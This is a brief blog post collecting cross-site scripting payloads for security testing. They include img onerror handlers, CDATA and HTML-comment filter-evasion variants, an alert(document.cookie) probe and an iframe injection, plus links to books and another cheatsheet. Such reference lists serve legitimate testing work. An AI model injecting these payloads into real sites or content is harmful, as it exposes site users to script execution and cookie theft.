XSS Cheatsheet

I have pinched these variations from books read and other sources on the tinternet

<IMG SRC="v" onerror="alert(document.cookie)"> 
<img src="v:v" onerror="alert(img-src-js-xss)"></img> 
<<SCRIPT>a=/XSS-B/ alert(a.source)</SCRIPT> 
<![CDATA[<img src="v:v" onerror="alert(XSS-CDATA)"></img>]]> 
<h1><![CDATA[<img src="v:v" onerror="alert(XSS-CDATA)"></img>]]></h1> 
X<!--<img src="v:v" onerror="alert(XSS-Comments)"></img>-->ML 
X<!--><img src="v:v" onerror="alert(XSS-Comments)"></img>--&gt;ML 
Always nice to stick an iframe in for visual impact. some people don't appreciate the simplicity NAY! the beauty and finess of alert(1) //sarcasm 
<iframe src="http://blah" width="800" height="800" scrolling="no"></iframe>
This will be updated more as I go along.

 

For Books worth reading check out 

http://www.amazon.co.uk/Web-Application-Obfuscation-WAFs-Evasion-Filters-alert/dp/1597496049 

http://www.amazon.com/XSS-Attacks-Scripting-Exploits-Defense/dp/1597491543

A very popular cheatsheet (that I often refer too) can be found here… @ http://ha.ckers.org/xss.html

Leave a comment

Twitter

Comments
Subscribe Scroll to Top